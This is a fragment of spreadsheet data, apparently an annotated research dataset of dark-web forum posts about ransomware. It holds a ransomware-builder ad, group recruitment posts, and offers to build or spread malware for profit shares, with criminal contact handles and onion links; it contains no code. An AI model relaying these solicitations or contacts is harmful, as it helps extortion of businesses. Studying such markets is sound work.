    <t>don't even... making ransomware, ran the code like a retard just after implementing the encrypt function, didn't bother including decryption (the xmr to unlock it was gonna be a scam).;;my hat is white now though.</t>
  </si>
  <si>
    <t>/u/personaluse</t>
  </si>
  <si>
    <t>27/10/2021 21:59</t>
  </si>
  <si>
    <t>0 days 02:14:00</t>
  </si>
  <si>
    <t>i have no idea i"m here to learn too</t>
  </si>
  <si>
    <t>/u/Vickie</t>
  </si>
  <si>
    <t>28/10/2021 20:21</t>
  </si>
  <si>
    <t>0 days 22:22:00</t>
  </si>
  <si>
    <t>proof: https://xss.is/threads/52934/page-8;;yashma is sophisticated version of chaos ransomware:;in this version:;1. new name for fast and better ransomware;2. fast encryption - 4-5 times faster than before ( with multi threading );3. fast decryption - 4-5 times faster than before ( with multi threading );4. added "stop backup and anti malware services" feature;5. fixed bug in dropped file name. now you can add your own type of filename for example readme.html;6. improved aes encrypting method;;50% discount will be added for any type of bug report.;;any.run result: https://app.any.run/tasks/0b65294f-be7d-4264-a690-74d93b39e627;;video tutorial: https://vimeo.com/manage/videos/702131779;;costs only : 25$;;contact:;icq: @yashma;telegram: @user99898</t>
  </si>
  <si>
    <t>Advertising a new ransomware (Yashma which is an updated version of Chaos ransomware)</t>
  </si>
  <si>
    <t>/u/Yashma</t>
  </si>
  <si>
    <t>ad3676ff3fb47e9b314d</t>
  </si>
  <si>
    <t>Yashma ransomware builder v1.2</t>
  </si>
  <si>
    <t>1 days 02:26:00</t>
  </si>
  <si>
    <t>why would you post the app*any*run link if you sell it? everyone can download the sample and make their own version from it, and you still not fixing the bug with the encryption/decryption part where's the encrypter destroying the larger files and decrypter itself can't decrypt the larger files.;- uoxqi4lrfqztugili7zzgygibs4xstehf5hohtkpyqcoyryweypzkwid(.)onion/?img=21652160717.png;- uoxqi4lrfqztugili7zzgygibs4xstehf5hohtkpyqcoyryweypzkwid(.)onion/?img=171652160773.png</t>
  </si>
  <si>
    <t>0 days 13:37:00</t>
  </si>
  <si>
    <t>he did a big mistake by uploading it to any run. it's not a smart move. lol</t>
  </si>
  <si>
    <t>raas provider (group) / debate</t>
  </si>
  <si>
    <t>0 days 05:15:00</t>
  </si>
  <si>
    <t>first of all it is demo and second of all who creates ransomware with that source code also needs to create decrypter for it. i see that everybody is smart here :)</t>
  </si>
  <si>
    <t>raas provider (individual) / debate</t>
  </si>
  <si>
    <t>0 days 07:34:00</t>
  </si>
  <si>
    <t>i���ll start off my stating something radical: encryption isn���t an inherent feature of a vpn.;;here is what a vpn really is ��� it���s a point-to-point or site-to-site connection tunneling through existing networks to reach a local area network.;;this is how (a) people work from home (b) regional/branch offices connect to each other and to their corporate headquarters. this is a  point-to-point, site-to-site, or host-to-network topology. this is not the ���vpn��� we subscribe to. this is what makes industry possible, connecting intranets and extranets.;;;all vpns log ��� so what and how can i be sure?;when you get into the field of networking you spend a lot of hours doing ���labs��� which involves reading logs. and you spend a lot of time with software like wireshark, packet tracer, gns3 where you capture traffic in the form of packets and analyze them.;;a router or a switch doesn���t have a monitor so in order to see what is going on you view thet port;x;came in on, with which protocol, the packet size, etc.;;you can see ���handshakes��� between client and host and gather information like cipher strength, ip addresses, data encryption. dns queries, which version internet protocol is being used, live data can be read back, you can do basic things like trace a route and obtain its average meantime in roundtrip.;;you can filter wireless, usb, voip connections, as well. you use things like port mirroring to debug and diagnose errors and monitor inbound and outbound traffic. you are basically watching data streams flow across a network. managed service providers do this for their customers.;;when things get more advanced you analyze the packets, examining the tcp/ip stack itself; you learn to record the headers. you can learn to tell the difference between what a real ssl/tls handshake looks like and an artificial one, used to cloak packets in the shape of ssl to help them pass through filters.;;a general task would be to analyze network problintrusions and anomalies, monitor bandwidth utilization, keep an eye on endpoint security, consistently verify access control lists, firewall status, spam filters, watch for misuse by both internal and external users. the vpn���s routing table only knows of specific addresses so it has to figure out how to get you to your destination (and which protocol to use). often, they rely on the security of a single provider's network to protect their traffic in transit.;;;how did we get so good at this: signals intelligence (sigint) ��� the nsa taught us.;;;i don���t see it as a problem if they keep logs. i expect them to profit off us in some way or another. but i do not envision legal problems, either.;;the smaller the vpn company, the more dangerous it is for you. like tor, there is significant safety in numbers.;;it is not a good habit to use the same geographic location permanently as you creating a discernable fingerprint. it is best to mix things up.;;a vpn is a tool, good at what it���se;;you use it in a coffee shop, airport or wherever there is public wifi for security���to encrypt your traffic.;;hides, to the best of its ability, activity from the isp.;;presents the entry guard with the vpn���s ip and not the isp���s ip.;;bypasses censorship by routing you to various locations.;;can influence your obtaining of tor bridges based on your starting geography.;;allows you to torrent without receiving notices from the isp.;;can influence where your exit node will be as a security measure.;;;;;tor usage;;obfuscates all information about traffic by routing you through three independent tor nodes.;;tor browsers makes all users look the same, making it nearly impossible to identify a single user.;;privacy and anonymity by design: each node only knows the hop before and after it and nothing else.;;no party knows the identity of the user.;;entirely open-source and under constant peer audit.;;has safety countermeasures built in per tor-specs to prevent adversarial attacks.;;the circunged at random; a new identity can be taken on, unlinking all previous activities, giving you even more safety.;;;;;nothing is bulletproof ��� your isp can still detect tor usage, if it cared to. especially on systems like qubes, tails and whonix.;;it can be used as an extra layer of security or it can harm you so use it accordingly.;;;so, if we aren���t using a vpn what are we beings sold?;vpn;as a service;���basically a secondary isp.;;;if your payment to your vpn is not an anonymous payment method then you���ve messed up, need to cancel and play the game from scratch, somewhere else.;;do not be mistaken that a "private". you can still be tracked through tracking cookies and device fingerprinting, even if your ip address is hidden and in no way are you protected from ransomware or hackers.;;always use the strongest encryption algorithms available to you. see if your provider offers socks5.;;remember, tor does not use udp, so make sure your settings are configured for tcp only.;;find out if your provider offers wireguard, supports multihop, obfsproxy, and ssh tunnels.;;don���t go weak: select their strong data encryption, data authentication and handshake encryption.;;the more number of countries they are in and subscribers they have, the safer you are.;;many have warranty canaries. see if yours d</t>
  </si>
  <si>
    <t>User discussing how a VPN may be something more sinsiter</t>
  </si>
  <si>
    <t>26/03/2022 23:01</t>
  </si>
  <si>
    <t>/d/Guides</t>
  </si>
  <si>
    <t>ee5aff3491480798a2fb</t>
  </si>
  <si>
    <t>You're Not Really Subcribing to a VPN ...</t>
  </si>
  <si>
    <t>1 days 04:09:00</t>
  </si>
  <si>
    <t>as always, i don't understand most of what you said but i will do my best to put all these into practice so i can keep myself secure.</t>
  </si>
  <si>
    <t>/u/ruinitall</t>
  </si>
  <si>
    <t>26/03/2022 23:04</t>
  </si>
  <si>
    <t>https://www.coresecurity.com/core-labs/articles/what-zeppelin-ransomware-steps-prepare-respond-and-prevent-infection</t>
  </si>
  <si>
    <t>A URL</t>
  </si>
  <si>
    <t>2a97b36db3e0e39217cd</t>
  </si>
  <si>
    <t>Zeppelin Ransomware</t>
  </si>
  <si>
    <t>0 days 16:19:00</t>
  </si>
  <si>
    <t>very interested as a new person to this, so i will have to build this ransomware, is there a version already built for new people;;i simply just wanna ransomware malware to spread by email</t>
  </si>
  <si>
    <t>User interested in new lockbit ransomware</t>
  </si>
  <si>
    <t>23/09/2022 08:51</t>
  </si>
  <si>
    <t>9165c2bc96228a926429</t>
  </si>
  <si>
    <t>[ LockBit Ransomware ] v3.0 Bulider Leak</t>
  </si>
  <si>
    <t>5 days 18:28:00</t>
  </si>
  <si>
    <t>almost $7mil in cash, it's ridiculous to think they were just sitting on it without keeping it somewhere less;raid-prone;.;;i guess the fsb is just picking off the low-hanging fruit and putting them on display as a show of effort against cybercrime. will get nominal charges and probably walk free with an unspoken hint to;continue disrupting western ifrastructure;.</t>
  </si>
  <si>
    <t>Post commenting on FSB arresting various ransomware members from Revil</t>
  </si>
  <si>
    <t>14/01/2022 16:50</t>
  </si>
  <si>
    <t>3b8bac129801c6917cc8</t>
  </si>
  <si>
    <t>[14 jan] FSB arrests REvil ransomware gang members</t>
  </si>
  <si>
    <t>55 days 15:50:00</t>
  </si>
  <si>
    <t>yeah, possibly. they are apparently charged only for "money laundering" of some sort of, not even hacking. i still find it fascinating. i wonder if they'll work for the fsb now?</t>
  </si>
  <si>
    <t>/u/spotifyplaylist</t>
  </si>
  <si>
    <t>14/01/2022 16:51</t>
  </si>
  <si>
    <t>through it's existance, revil had around than 70 affiliates;people who were for some time members of revil;;ofc, not all of them are in russia;but those busted;they are just one part, most of revil is still on freedom</t>
  </si>
  <si>
    <t>55 days 09:51:00</t>
  </si>
  <si>
    <t>i fully understand this skepticism therefore the interview will only follow this standardized set of questions:;;- how integrated is your business model (what services are delivered by third parties)?;- how do you monetize your work;--&gt; classic ransomware. encrypt &amp; pay to decrypt;--&gt; hybrid ransomware. encrypt &amp; threaten to publish corp. data &amp; extort money;--&gt; more complex. encrypt &amp; auction off data, resell, extort, ...;;this information should not be very useful for lea - however everyone is free to answer or not.;;the procedure is based on works of this book: https://www.springer.com/de/book/9783531172385 (experteninterviews und qualitative inhaltsanalyse);;regarding the "opposition against what we are all about" i think this position may actual worsen the problem. if there is no information about what is going on, the actual risk may be perceived higher than it actually is.</t>
  </si>
  <si>
    <t>Adademic research professional looking to interview ransomware operators</t>
  </si>
  <si>
    <t>Information (request)</t>
  </si>
  <si>
    <t>/u/reserger</t>
  </si>
  <si>
    <t>959c53e778abb6ad7e30</t>
  </si>
  <si>
    <t>[Academic Research] Looking to interview ransomware operators</t>
  </si>
  <si>
    <t>2 days 02:33:00</t>
  </si>
  <si>
    <t>looking for programmer to compile ransomware software. c++ or python versions. message for details on job and payment</t>
  </si>
  <si>
    <t>User looking for programmer to compile ransomware software and to message for more information</t>
  </si>
  <si>
    <t>/u/English20</t>
  </si>
  <si>
    <t>193e8fc8940d1fc3148a</t>
  </si>
  <si>
    <t>[JOB - BTC] Looking for programmer to compile ransomware software</t>
  </si>
  <si>
    <t>hello guys i want to offer an amazing opportunity to all the ransomware enthusiastic that want to spread ransomware but they don't want to pay a single buck for it (you don't have the money or you have afraid to buy shit malwares) so my offer is pretty simple i am going to give to you the infected file and then you are going to spread it, don't worry this is not a free github project and yes the ransomware doesn't get detected by most of the avs so don't worry if you have good abilities you can make great things with it. the ransomware has great functionalities like:lan spreading, anti vm/sandbox, uses aes 256 +rsa 4096 (very strong encryption), changes windows log on password,works completely offline, uac/amsi bypass and so on. remember you won't pay nothing not even a single buck because i can generate how many files you want for free, there is not a limit  and every files will be almost 100% fud but since this service is free and very good i will take the 40% of every successful attack from every company or random guy, however if you want to contact me or you want to change terms and conditions email me here: theleer@protonmail.com;;contact me only if you are serious don't waste my time and yours, spreading ransomware it is hard and requires a good plan to fool someone</t>
  </si>
  <si>
    <t>Offer to spread undetectable ransomware for free. 40% commission on successful attacks.</t>
  </si>
  <si>
    <t>5d0f96a82974d3783f6b</t>
  </si>
  <si>
    <t>[JOB - BTC] spreading high quality ransomware</t>
  </si>
  <si>
    <t>0 days 13:47:00</t>
  </si>
  <si>
    <t>no one is gonna spread your malware for you. stop fucking spamming this on multiple accounts.</t>
  </si>
  <si>
    <t>0 days 04:08:00</t>
  </si>
  <si>
    <t>hi, i'm holylulz - hr and senior manger for no mercy ransomware group.;;;;let me introduce you a bit to our team. our main goal is to make money (oh! that obvious) and also to learn and practice new things which help in development of new projects. what makes us unique? it's our discipline and hard work. every day we are trying to cross our boundaries and we have no respect for slugs but if you are ambitious i have great news for you. so you can earn rewards points u can exchange later on more money. we only attack companies which have the ability to pay the requested amount. we have no intentions to kill your business.;before any attack we carefully analyze your accountancy and then;determine how much you can pay. once the payment is confirmed in;blockchain we hand over the decryption tool.;more information on personal interview.;;;;;so;;;;;we are looking for these kind of people listed below.;;1- penetration testers/hacker: those on the front lines battling against;corporate security teams to steal data and plant ransomware.;;2- coder: programmers to write malicious code, integrate disparate;technologies.;;3- tester:- people responsible for testing malicious codes (malwares) against;security tools and sometimes advice developers to bypass these antivirus;programs.;;4- administrators:- people tasked with setting up, and maintaining group���s;attack infrastructure.;;5- reverse engineers - disassemble computer code, study;it, find vulnerabilities or weakness.;;6. managers;;;;how you can contact me?;- pm me or just drop a comment below.;;;thank you for your time, hope we will work to</t>
  </si>
  <si>
    <t>No Mercy ransomware group seeking skilled hackers, coders, testers, administrators, and reverse engineers to attack companies for profit.</t>
  </si>
  <si>
    <t>/u/th3unknown13</t>
  </si>
  <si>
    <t>f544b2b4013f8f1c0466</t>
  </si>
  <si>
    <t>[JOB - MULTI]   We are hiring for Hacking Team</t>
  </si>
  <si>
    <t>hello all,;;i'm looking for expert in ransomware development and spreading expert.;;paying in btc or xmr + % royalty.;;brav0ex@secmail.pro;pgp only.;;-;-----begin pgp public key block-----;;mqenbgagjmkbcaddmb682o0lm/6cxl41888mfufr8dxd5n2zhczwe1k2onijdznq;dmd3iw6ffv7qdrrvigsrxstgvywcxpqmanahijim9kaqf2d8tqkxlwltafulem11;sfq3qy8lzagcichpomcjcg02ccrpfh0iljck4rasvauskjnkwksny7y2spkql9k/;rcvi4gp5ffpahwmj42a3jwzomtkijsudvovnvaaki7xj+evhelq6hy8kxiyc0+aa;bh+cbssabrqqatiqzduwnw3kel3o3f87tmrivbeh7c53/bihpkki7ewefsq/sqqq;narkham4wk1ztuzkt8xxbtcyl5uhpw3bxle7abebaag0hwjyyxywzxggpgjyyxyw;zxhac2vjbwfpbc5wcm8+iqfobbmbcga4fiee8bmreaipkoilt/2jidnzdhdj09of;amagjmkcgy8fcwkibwigfqojcascbbycawechgecf4aacgkqidnzdhdj09rwiaga;ulzt2xpw+cr/8ctkhvqgmjlk5exe5gzp4njrt6pv2poxyz843y8tcyn+a1rqxooj;sgbufbnxdxyt7k4j60q9fjskvqttjuf3fnk1gdznkv17xzze2uh7lkrhdnd4/qlq;+rhpoxgjs/tkw0fzevsk3ajx213/jy1y/hqciozxfbbbmycf8rx9smoapz7meh37;acj4us0vgyxvzzuklrmpummjl08qryetmw7ocbtssceddxaun1zzbvafptg6xuba;wpqffhdsldjuddbunqpm1dqmq/ntigro3gv4graadpz6werx/dnz4dbhpgvqhedf;js1njcobfweijnwy2bnvblkbdqrgictjaqgaxuuo7yuled67cnkjlid3ftssmqlj;gx2g8+wnoljb+rplzhbnlkoaljhv0vgitpi8l6yu0cnpij28a/wgyfquvvlxyd4q;q08fjydgpldlgnfo+crkbexc/lu3w6i49efpuynghy54trqdfqla1nc1cgrd9uce;togkvgegjl2mminhmioz//to4ewow5hbx+/fnmdf3jdanqac8ydlu6tz0wov9otk;z3+qj6r2vlf0arhyf/haqqmvpjr6vtaznevgqzurgwlsyscn0jqx1u2stc2izlsl;essx5kbepyb1wru5esyktnpedogyd5qlba4pq5drs2iccxtyx/iol9plvwaraqab;iqjsbbgbcgagfiee8bmreaipkoilt/2jidnzdhdj09ofamagjmkcgy4bqakqidnz;dhdj09radcaegqekab0wiqsonrvwwlfvhahoyxvcg6vitvxslqucycakyqakcrdc;g6vitvxsltunb/4sl+hg0ni0kr5sbkasgyndjehrm9aqu/qrfbezxd31jo8mchdc;szlxyuy4x006ni6cympry3oqhwkzmcib8wyovthw28ugulw105fzj/goejrd2puh;o0rskjpeuvqz01vnpo+v2vv3yzxb2oubfmcutbopxfnq3lavf01xpvrfekvphydi;4gqnsahg3jt0nkdth7cnksoygpiqi7otibisymifikvtfhyqnqou6jxv/humqix9;bby2uguq5nvd6bnk1n6x0fylgngqk9bsz/uktz2lvc+ikiicpm9pq6mf3cmankqr;0dgt0e4s42dqw4oih6u2l0yev4rv2mlmh747hbmh/ifkqs7iyaemdpa1if9tqewc;0evhgyyrk9optfc8/msdhesn0pw8sfseuae9z8iw2zpibmmily3jfou4dd+ou7gy;dtxuano36paopqcd2r7mqjwmcgwnr70lxp8wtbwmkz5pptiiokqa7kigp3lhjsce;izlkotwqrsqzjyuxjvyzwrjivz75asmfmuvcwjsran161+1jmxlnpaxnf5w7dh17;mofjuvs6xhg/vnnsq1ufj3+fy5ctufsfkbkvdpc2/kakwxfyinfe0xfrfhetyuee;ca7sugcoi4b4ggbbyldufsnwwf1myfvy/hc9anfzadoeuaepw6147e/ossolmuy=;=bdoc;-----end pgp public key block-----</t>
  </si>
  <si>
    <t>Seeking hacking sevices</t>
  </si>
  <si>
    <t>/u/DrugsInc</t>
  </si>
  <si>
    <t>c77fd5f3250d27328901</t>
  </si>
  <si>
    <t>[JOB - MULTI] - Ransomware and LAN Spreading Expert</t>
  </si>
  <si>
    <t>willing to pay up to 5k to get keys for the 5 machines that we needed retrieval from, make a quick 5k.;;will use escrow so we both are safe. key is listed below;thanks mrsassypants;;njc0lxk5mwnys0x4us8wyxfhu09sa2q0eg9qzwlyz0jjnmz4ttr0bi8wsfdyt0dqwmxlzwdxyi9uvwsreu42zzzras9qamjwcdjxq2xqrvlsb1d5dwp2rwhpsno4agvamzfub09zmnj1alexag9gn25va05ua2lyb3j2dnndsfmzr1frrufizthzu1djz0lrb1hjemwrds81su4zn25infk3surznzbjrgvov0wym2j6cdh0vfplmljkmjhpc1rcoextckxnahvjdjrtmtz3n2ftwthwdhn0neloa0djb1qya2czk2hlcctxwnv0mwsyumrsdgfnbzn0mtbdnknnwfbuahbzymzjtnj6ykpel1bpbzz4mdbhvgtfadqwskn0nxvhnmxuuvj5sxdizg9lt0xwv0c3n3lqbgfioefeuzv2vhzyufpnn3numhi0aedwy3lxefj6b0wzrgrbmho1n1j3a2yzbklatgxosvrvoxvtsdr5bmttuwjcwujhym5addrzauvet0pfc3a1ky9tynjvv1diumj2cvlbourhufh0unlkc2l2dflxsxkwl09qtupvnny1ymzeuzfrmdzxenzytlzqzghlqzhxznjwy2llwjnwaku2bktrewmrsfnktzz6y1m2mze4bvvmzm9nszb3c21gnxjluu12a0thynaydvrittnxyxrtr3rxa016mna0n0nqanliyxvzmgnwbki5ajd0sgmrnlptt1rvqmjkzja4dvnqykxps21qbuk0q2nsmwjtaujukzu0oewyqtdrufgwy0z5cvvxckp2eep5agvunldan3zclzhzdjz2t1o1b1fyrhvrutz3wnj3aunvrjbpy2ruovl4wdzmqlhvwktpcxdxc2exmthttwpkuhuwqlniujnedgvhl3pxvgpncwwxek16qusxndhbskr6smr3q0zlnxfmmljka2y3agteztl3whlmejd0bgtswehledfsdnbzaewzotj6ugrtoxleawnnuknwyk50um51vuiyrk9utwjztjy3btr2sgm3wtk4ymnwcmi2bndhbtbwekpheknrl2tceddywux2ze1qrmeyne53a2m4wk1qwhlvyvnnnjlnoda2sge2l0x2q1drblhlyxf3b2zrrkddafrkz3zkb0xrendncuxtsk14t1res2rtohzxvtdcl2zguzi4qxjlrkhhekfxmwdqsvrvnuvoqwjgsjdqudzgeej5c1vil2pjovnxqwiztk8xsulwvde5ru51s0svwfnbmkq2efdsbw1xs0y5bwjyehywrjvhs2tvk0fianrcuzv3cgk4uzzym052d29mmlrwsmuxretmajjts0o2m1z3qjj5czqyoew2qjvqnjrzelfly21jmnlkvs9rmmrvcvbmuet6yndbz1hivnfzzitob0xarfz4ugxys1zdvzdmsurwqwlac2h3sm1zblflngpezvczwupsrmxbyzrttef3ow9jberxdctmym5ymhvwtvzuanl5b3fqnlnkmepmakrqy3demjdwnktgqjhezvlycdh3szbewe8ywm5mr1qxz1nkvzu0azjnu1lqstz2rzvbmldadjffzytfkzfxqvvsy1g2wgfztferawqvwepks2hxwxn1vvzuvgxddwfotnlmwg5rm3donwlflzzjahvtqkpzb3lpahzlck4vakvktmfqymllzfm5njb3k2rvzstsnwp1nhhhn1p1bfh4avvlmwvtlzluulgvr1a1a2lon0u5akdkzmliterlvss2vuq3smmzcmxpkzbzcdbir0z6awzktvjmbeoynxptq2fzn2xtzkm2mxvxclvqqkpvekdgtxvqmc85mhjtswrvcuhxb0dsnvdpsxl6c3btretldnpcy2ovejlmsum4sgxxrumvuuztudljdkply3bmynizsho3vfa1egxxtmfjqkjlu3bovkfrm1hpwmrudfkvognnsxntck9xy1ziu1kycnvszkqwcg9bblv4ujvsse9cc1a5owpidxnvzgnhv1m5ekpku0rctkzomusyqtnvofe2ruzoavkwrlhyyvlydk5wvvjzanowuulpwmflbeuyvytmuw1wowtms0tkvwzcs1jonc9gsehhbu5hws95wud2a3fgng1wkznrvmpbm2f6owrrc2x3k0dwbwrooevxakxoew95y2fhywt0dwvlempwwlhenk14zezntc9zaeexbjvnse1nmjj0qmjsb1zjd2v5q1hsu2r4tez1whhvtddqu1nbvvpdefhdohl2wmvmynf4deivng==--------------------------------------------------------------------------------*</t>
  </si>
  <si>
    <t>/u/MrSassyPants</t>
  </si>
  <si>
    <t>90c50289d527120b5a29</t>
  </si>
  <si>
    <t>[JOB - MULTI] Decryption key needed from avaddonbotrxmuyl.onion for 5 machines</t>
  </si>
  <si>
    <t>5 days 22:37:00</t>
  </si>
  <si>
    <t>just pay the ransom, you will get scammed, theres a reason big companies cant even decrypt sophisticated ransom</t>
  </si>
  <si>
    <t>/u/CardsRus</t>
  </si>
  <si>
    <t>from the bleeping computer article about this ransomware:;;"unfortunately, id-ransomware creator michael gillespie has analyzed the ransomware and stated that it is secure and cannot be decrypted for free."</t>
  </si>
  <si>
    <t>/u/AngelaBennett</t>
  </si>
  <si>
    <t>send me a message on jabber /xmpp mate: dutch@jabb.im;i am a experienced developer in ransomware, malware and web development and can do this no problem for you.</t>
  </si>
  <si>
    <t>/u/Waters</t>
  </si>
  <si>
    <t>30/05/2020 09:03</t>
  </si>
  <si>
    <t>38f6a0399b03b1830a54</t>
  </si>
  <si>
    <t>[JOB - MULTI] Looking for somebody to make RaaS</t>
  </si>
  <si>
    <t>1 days 17:12:00</t>
  </si>
  <si>
    <t>hi, i'm holylulz - hr and senior manger for losextranejros ransomware group.;;;;let me introduce you a bit to our team. our main goal is to make money (oh! that obvious) and also to learn and practice new things which help in development of new projects. what makes us unique? it's our discipline and hard work. every day we are trying to cross our boundaries and we have no respect for slugs but if you are ambitious i have great news for you. so you can earn rewards points u can exchange later on more money. we only attack companies which have the ability to pay the requested;amount. we have no intentions to kill your business.;before any attack we carefully analyze your accountancy and then;determine how much you can pay. once the payment is confirmed in;blockchain we hand over the decryption tool.;;what we can offer?;whats the work schedule?;;- a specific 6 day workweek (managers 7 days), so thats ome number of staff is always available, thats what make them ready to handle issues immidiately.;;-we also offer paid leaves(this will be rolled out once we have at least 3ransom payment). this is to stabilize our group and manage our cashflow. we also offer timely salaries +% of the ransom payment.;;;;;more information on personal interview.;;;;;so;;;;;we are looking for these kind of people listed below.;;;1- social engineers: for phishing campaings and operations related to them.;;2- tester:- people responsible for testing malicious codes (malwares) against;security tools and sometimes advice developers to bypass these antivirus;programs.;;3-  coder: programmers to write malicious code, integrate disparate;technologies.;;;4- reverse engineers - disassemble computer code, study;it, find vulnerabilities or weakness.;;;;;;how you can contact me?;- pm me or just drop a comment below.;;;thank you for your time, hope we will work together</t>
  </si>
  <si>
    <t>6fec2f6977b4e2826531</t>
  </si>
  <si>
    <t>[JOB - MULTI] WE ARE HIRING FOR HACKING TEAM (SKILLED ONLY)</t>
  </si>
  <si>
    <t>7 days 06:39:00</t>
  </si>
  <si>
    <t>i dont see ransomware or extortion ruining a person life or family. you do you but i dont think anyone is gonna support you here</t>
  </si>
  <si>
    <t>Person opposing ransomware and extortion</t>
  </si>
  <si>
    <t>/u/brookybanana</t>
  </si>
  <si>
    <t>3a4c6bad849952100254</t>
  </si>
  <si>
    <t>[JOB - XMR] - Need help or ideas blackmailing ultra-high networth (infidelity)</t>
  </si>
  <si>
    <t>10 days 09:35:00</t>
  </si>
  <si>
    <t>fuck i feel bad now ok i change my mind on this..it's not like we would've ever told anyone anyway, it's just a bluff.;i was thinking it was same concept as ransomware or extortion where you have video proof of someone doing something bad, and using the threat of harming their reputation for money</t>
  </si>
  <si>
    <t>Person changing their mind on ransomware</t>
  </si>
  <si>
    <t>/u/helpextort</t>
  </si>
  <si>
    <t>i don't need their information, i just need an attack done.;;i'd like to target a specific business of my choice (law firms, dentists, etc).;;any of the following will suffice:;- sql attacks;- ransomware / malware;- pop ups;- backups infiltatration;;hitting ransomware sometimes won't be enough if they have a backup. gotta destroy data too. or utilize email impersonation and take over their computer and send malicious content out.;;let me know your price, and don't ask me why.</t>
  </si>
  <si>
    <t>/u/over9000</t>
  </si>
  <si>
    <t>15/01/2021 09:01</t>
  </si>
  <si>
    <t>50f55a94383fee07b229</t>
  </si>
  <si>
    <t>[JOB - XMR] Hack Law firm / Dental Practices</t>
  </si>
  <si>
    <t>2 days 18:47:00</t>
  </si>
  <si>
    <t>hello everyone,;;i'm looking for someone who has lots of connections and good scores on deep web forums for marketing my open ransomware project.;;it wouldn't require much time and they will earn a decent provision in xmr for each decryption.;;if you think that you satisfy this contact me :);;greetz;cerebrate</t>
  </si>
  <si>
    <t>Seeking hacking connections</t>
  </si>
  <si>
    <t>28/05/2021 17:25</t>
  </si>
  <si>
    <t>9093db866f27f6105b97</t>
  </si>
  <si>
    <t>[JOB - XMR] Need a deepweb/clearnet marketing partner</t>
  </si>
  <si>
    <t>im looking for someone that has some programming skills to help me spread a ransomware and wanna share the profits. i also already have a website ready that is really credible and will be used to spread and also the ransomware itself but needs to be crypted.;more info pm me</t>
  </si>
  <si>
    <t>/u/Yurigos</t>
  </si>
  <si>
    <t>21/08/2022 13:59</t>
  </si>
  <si>
    <t>cc752eb043c4bfa4b3ec</t>
  </si>
  <si>
    <t>[JOB - XMR] help me spread ransomware</t>
  </si>
  <si>
    <t>0 days 17:02:00</t>
  </si>
  <si>
    <t>is it  ransomware ?</t>
  </si>
  <si>
    <t>Asking about ransomware</t>
  </si>
  <si>
    <t>/u/bloodandhonour</t>
  </si>
  <si>
    <t>15/11/2020 06:32</t>
  </si>
  <si>
    <t>a611b63a3b19603d9d0a</t>
  </si>
  <si>
    <t>[JOB BTC-XMR] Will Pay You To Spread Malware</t>
  </si>
  <si>
    <t>0 days 01:55:00</t>
  </si>
  <si>
    <t>4 days 09:05:00</t>
  </si>
  <si>
    <t>i���ve recently become victim to a craigslist scam and want revenge from this horrible person. i saw a craigslist ad for a bike listed for $800 and reached out to the seller. the seller responded with more details and i didn���t sense anything unusual. my mistake was to pay the seller via ebay gift cards through a (very official looking) ebay email to my account rather than on the actual site. (dumb move���.) i gave the codes to the seller, and a day later received an email from ���ebay��� asking for $400 more to cover insurance. i was suspicious so called ebay directly and quickly realized i���d been scammed.;;i've been in touch via email with this seller because i���ve been playing along to keep them thinking i don't know what's going on. i realize gift cards are impossible to reverse, but i did do some digging myself and can provide you with their email address, ip address as well as hostname and isp (in the united states) i have a strong suspicion this is a stolenmeone who can send them some sort of ransomware with a bitcoin address to repay my stolen $. if that���s not possible, i want to ruin them financially and ensure they���ll never do this;again to anyone else. it's not really about the money now for me, i am simply repulsed by this piece of shit and want revenge.;;</t>
  </si>
  <si>
    <t>Seeking hacking sevices after money was stolen</t>
  </si>
  <si>
    <t>/u/dartboard75</t>
  </si>
  <si>
    <t>25/01/2021 11:36</t>
  </si>
  <si>
    <t>32e3fb4a1c695f576cf3</t>
  </si>
  <si>
    <t>[JOB ��� BTC] Hacker needed for revenge to Craigslist s</t>
  </si>
  <si>
    <t>84 days 12:23:00</t>
  </si>
  <si>
    <t>i dont see any difference between carding and this.if i had the time i would do ransomware to skim corporates.but i dont have the time.</t>
  </si>
  <si>
    <t>Comparison of ransomware to carding</t>
  </si>
  <si>
    <t>ec5c12bd6fb49aaf915f</t>
  </si>
  <si>
    <t>[JOB-XMR,BTC]Looking for a partner to spread my scam</t>
  </si>
  <si>
    <t>me and my group wish to colaborate with a programmer on the long term for mitm / ransom attacks.;;we will agree beforehand on the price of your work.;;you can dm me for details and questions and all our conversations afterward will be done on tox.</t>
  </si>
  <si>
    <t>Seeking hacker services</t>
  </si>
  <si>
    <t>136dc89096f53886ff9e</t>
  </si>
  <si>
    <t>[JOB-XMR/BTC] Ransomware.</t>
  </si>
  <si>
    <t>im looking for someone that will develop a good mbr ransomware. that reboots the pc, hijack the mbr and display a ransomnote for receiving a key to get the things solved.;;only capable people. pm me if youre interested.</t>
  </si>
  <si>
    <t>/u/HydroFool</t>
  </si>
  <si>
    <t>29/08/2022 20:53</t>
  </si>
  <si>
    <t>2bb3be2504b53c3a7302</t>
  </si>
  <si>
    <t>[JOB-XMR] Developing Malware</t>
  </si>
  <si>
    <t>looking for someone that wants to help me spread an almost fud rat and split the profit after we deploy ransomware on the machines.;;more info on telegram @absolutes2</t>
  </si>
  <si>
    <t>27/08/2022 17:34</t>
  </si>
  <si>
    <t>211a0f45db122c0c3118</t>
  </si>
  <si>
    <t>[JOB-XMR] SPREAD A RAT</t>
  </si>
  <si>
    <t>-ransomware for sale :;fud ransomware  with ability to send encryption keys to a provided email  so you don't have to set up  a server and have a lot of technical knowledge . all you need to provide is a ransom amount and an email address and you will rec</t>
  </si>
  <si>
    <t>Providing hacker services</t>
  </si>
  <si>
    <t>50caf4cc3204b6ba5ebc</t>
  </si>
  <si>
    <t>[JOB]  Ransomware for sale or as a service</t>
  </si>
  <si>
    <t>164 days 23:08:00</t>
  </si>
  <si>
    <t>looking for a skilled experienced rat dev.;;needs to deliver and execute a .apk silently;small stub;needs to be fud;need web panel accessible via tor (onion);not a locker/ransomware;other features will be discussed together;;i've seen some malware devs looking for jobs here if you feel like it please apply and show me some your work. let's work;;budget: $1000 or more;;contact me via pm we will then exchange jabber to further discuss</t>
  </si>
  <si>
    <t>/u/cannonpirate</t>
  </si>
  <si>
    <t>cff562a7b42c6dc821b2</t>
  </si>
  <si>
    <t>[JOB] Android RAT dev</t>
  </si>
  <si>
    <t>6 days 10:09:00</t>
  </si>
  <si>
    <t>03ccf222f970de758397</t>
  </si>
  <si>
    <t>[JOB] Developers/ Programmers needed for Ransomware Group.</t>
  </si>
  <si>
    <t>Vulcan ransomware group seeking skilled hackers, coders, testers, administrators, and reverse engineers to attack companies for profit.</t>
  </si>
  <si>
    <t>23/03/2022 10:44</t>
  </si>
  <si>
    <t>4469f1d08d385b905499</t>
